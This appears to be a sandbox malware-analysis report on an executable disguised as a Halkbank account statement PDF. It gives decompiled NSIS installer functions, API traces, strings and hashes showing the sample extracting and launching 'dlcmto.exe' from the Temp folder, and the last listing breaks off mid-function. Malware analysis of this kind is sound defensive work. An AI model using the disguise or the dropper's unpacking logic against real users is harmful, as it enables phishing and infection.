                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 2803837635-2434223388
                                          • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                          • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                          • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                          • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                          C-Code - Quality: 77%
                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                          0x0040176f
                                          0x00401776
                                          0x00401782
                                          0x00401785
                                          0x0040178a
                                          0x0040178d
                                          0x00401794
                                          0x004017b0
                                          0x00401796
                                          0x00401797
                                          0x00401797
                                          0x004017b6
                                          0x004017bb
                                          0x004017bb
                                          0x004017bf
                                          0x004017c2
                                          0x004017c7
                                          0x004017c9
                                          0x004017cb
                                          0x004017d0
                                          0x004017d0
                                          0x004017db
                                          0x004017db
                                          0x004017ec
                                          0x004017ee
                                          0x004017ee
                                          0x004017ef
                                          0x004017ef
                                          0x004017f2
                                          0x004017f5
                                          0x004017f8
                                          0x004017f8
                                          0x004017ff
                                          0x0040180e
                                          0x00401813
                                          0x00401816
                                          0x00401819
                                          0x00000000
                                          0x00000000
                                          0x0040181b
                                          0x0040181e
                                          0x00401874
                                          0x00401879
                                          0x004015b6
                                          0x0040292e
                                          0x0040292e
                                          0x00402c2a
                                          0x00402c2d
                                          0x00402c2d
                                          0x00000000
                                          0x00401820
                                          0x00401826
                                          0x0040182d
                                          0x0040183a
                                          0x00401845
                                          0x0040185b
                                          0x0040185b
                                          0x0040185e
                                          0x00000000
                                          0x00401864
                                          0x00401864
                                          0x00401865
                                          0x00401882
                                          0x00402c33
                                          0x00402c33
                                          0x00402c33
                                          0x00401867
                                          0x00401867
                                          0x00401868
                                          0x00401493
                                          0x0040239d
                                          0x0040239d
                                          0x0040239d
                                          0x00401865
                                          0x0040185e
                                          0x00402c35
                                          0x00402c39
                                          0x00402c39
                                          0x00401892
                                          0x00401897
                                          0x004018a5
                                          0x004018aa
                                          0x004018b0
                                          0x004018b4
                                          0x004018b6
                                          0x004018be
                                          0x004018ca
                                          0x004018b8
                                          0x004018b8
                                          0x004018bc
                                          0x00000000
                                          0x00000000
                                          0x004018bc
                                          0x004018d3
                                          0x004018d9
                                          0x004018db
                                          0x00000000
                                          0x004018e1
                                          0x004018e1
                                          0x004018e4
                                          0x004018fc
                                          0x004018e6
                                          0x004018e9
                                          0x004018f2
                                          0x004018f2
                                          0x00401901
                                          0x00401906
                                          0x00402398
                                          0x00000000
                                          0x00402398
                                          0x00000000

                                          APIs
                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                          • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00000000,00000000,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                            • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                          • API String ID: 1941528284-563075536
                                          • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                          • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                          • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                          • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                          C-Code - Quality: 100%
                                          			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                          0x004069dc
                                          0x004069e5
                                          0x004069e7
                                          0x004069e7
                                          0x004069eb
                                          0x004069fe
                                          0x004069f8
                                          0x004069f8
                                          0x004069f8
                                          0x00406a17
                                          0x00406a2b
                                          0x00406a32

                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                          • wsprintfW.USER32 ref: 00406A17
                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%S.dll$UXTHEME$\
                                          • API String ID: 2200240437-1946221925
                                          • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                          • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                          • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                          • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403479 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 532 403479-4034a1 GetTickCount 533 4035d1-4035d9 call 40302e 532->533 534 4034a7-4034d2 call 4035f8 SetFilePointer 532->534 539 4035db-4035df 533->539 540 4034d7-4034e9 534->540 541 4034eb 540->541 542 4034ed-4034fb call 4035e2 540->542 541->542 545 403501-40350d 542->545 546 4035c3-4035c6 542->546 547 403513-403519 545->547 546->539 548 403544-403560 call 406bb0 547->548 549 40351b-403521 547->549 555 403562-40356a 548->555 556 4035cc 548->556 549->548 550 403523-403543 call 40302e 549->550 550->548 558 40356c-403574 call 40620a 555->558 559 40358d-403593 555->559 557 4035ce-4035cf 556->557 557->539 563 403579-40357b 558->563 559->556 560 403595-403597 559->560 560->556 562 403599-4035ac 560->562 562->540 564 4035b2-4035c1 SetFilePointer 562->564 565 4035c8-4035ca 563->565 566 40357d-403589 563->566 564->533 565->557 566->547 567 40358b 566->567 567->562
                                          C-Code - Quality: 93%
                                          			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40e9e4
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                          0x00403489
                                          0x0040349c
                                          0x004034a1
                                          0x004035d1
                                          0x004035d3
                                          0x00000000
                                          0x004035d9
                                          0x004034ad
                                          0x004034c0
                                          0x004034c6
                                          0x004034cc
                                          0x004034d7
                                          0x004034dc
                                          0x004034e1
                                          0x004034e9
                                          0x004034eb
                                          0x004034eb
                                          0x004034f4
                                          0x004034fb
                                          0x00000000
                                          0x00000000
                                          0x00403501
                                          0x00403507
                                          0x0040350d
                                          0x00000000
                                          0x00403513
                                          0x00403519
                                          0x00403539
                                          0x0040353e
                                          0x00403543
                                          0x00403549
                                          0x0040354f
                                          0x00403559
                                          0x00403560
                                          0x00000000
                                          0x00000000
                                          0x00403562
                                          0x00403568
                                          0x0040356a
                                          0x0040358d
                                          0x00403593
                                          0x00000000
                                          0x00000000
                                          0x00403595
                                          0x00403597
                                          0x00000000
                                          0x00000000
                                          0x00403599
                                          0x00403599
                                          0x004035ac
                                          0x00000000
                                          0x00000000
                                          0x004035bb
                                          0x00000000
                                          0x004035bb
                                          0x00403574
                                          0x0040357b
                                          0x004035c8
                                          0x004035ce
                                          0x004035ce
                                          0x00000000
                                          0x004035ce
                                          0x0040357d
                                          0x00403583
                                          0x00403589
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004035cc
                                          0x004035cc
                                          0x00000000
                                          0x004035cc
                                          0x00000000

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 0040348D
                                            • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,esent,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: FilePointer$CountTick
                                          • String ID: esent$@
                                          • API String ID: 1092082344-3760738010
                                          • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                          • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                          • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                          • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 568 405b99-405be4 CreateDirectoryW 569 405be6-405be8 568->569 570 405bea-405bf7 GetLastError 568->570 571 405c11-405c13 569->571 570->571 572 405bf9-405c0d SetFileSecurityW 570->572 572->569 573 405c0f GetLastError 572->573 573->571
                                          C-Code - Quality: 100%
                                          			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                          0x00405ba4
                                          0x00405ba8
                                          0x00405bab
                                          0x00405bb1
                                          0x00405bb5
                                          0x00405bb9
                                          0x00405bc1
                                          0x00405bc8
                                          0x00405bce
                                          0x00405bd5
                                          0x00405bdc
                                          0x00405be4
                                          0x00405be6
                                          0x00000000
                                          0x00405be6
                                          0x00405bf0
                                          0x00405bf7
                                          0x00405c0d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405c0f
                                          0x00405c13

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                          • GetLastError.KERNEL32 ref: 00405BF0
                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                          • GetLastError.KERNEL32 ref: 00405C0F
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 3449924974-3916508600
                                          • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                          • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                          • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                          • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406BB0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 574 406bb0-406bd3 575 406bd5-406bd8 574->575 576 406bdd-406be0 574->576 577 4075fd-407601 575->577 578 406be3-406bec 576->578 579 406bf2 578->579 580 4075fa 578->580 581 406bf9-406bfd 579->581 582 406d39-4073e0 579->582 583 406c9e-406ca2 579->583 584 406d0e-406d12 579->584 580->577 585 406c03-406c10 581->585 586 4075e5-4075f8 581->586 592 4073e2-4073f8 582->592 593 4073fa-407410 582->593 590 406ca8-406cc1 583->590 591 40754e-407558 583->591 587 406d18-406d2c 584->587 588 40755d-407567 584->588 585->580 594 406c16-406c5c 585->594 586->577 595 406d2f-406d37 587->595 588->586 596 406cc4-406cc8 590->596 591->586 597 407413-40741a 592->597 593->597 598 406c84-406c86 594->598 599 406c5e-406c62 594->599 595->582 595->584 596->583 600 406cca-406cd0 596->600 603 407441-40744d 597->603 604 40741c-407420 597->604 607 406c94-406c9c 598->607 608 406c88-406c92 598->608 605 406c64-406c67 GlobalFree 599->605 606 406c6d-406c7b GlobalAlloc 599->606 601 406cd2-406cd9 600->601 602 406cfa-406d0c 600->602 609 406ce4-406cf4 GlobalAlloc 601->609 610 406cdb-406cde GlobalFree 601->610 602->595 603->578 611 407426-40743e 604->611 612 4075cf-4075d9 604->612 605->606 606->580 614 406c81 606->614 607->596 608->607 608->608 609->580 609->602 610->609 611->603 612->586 614->598
                                          C-Code - Quality: 98%
                                          			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
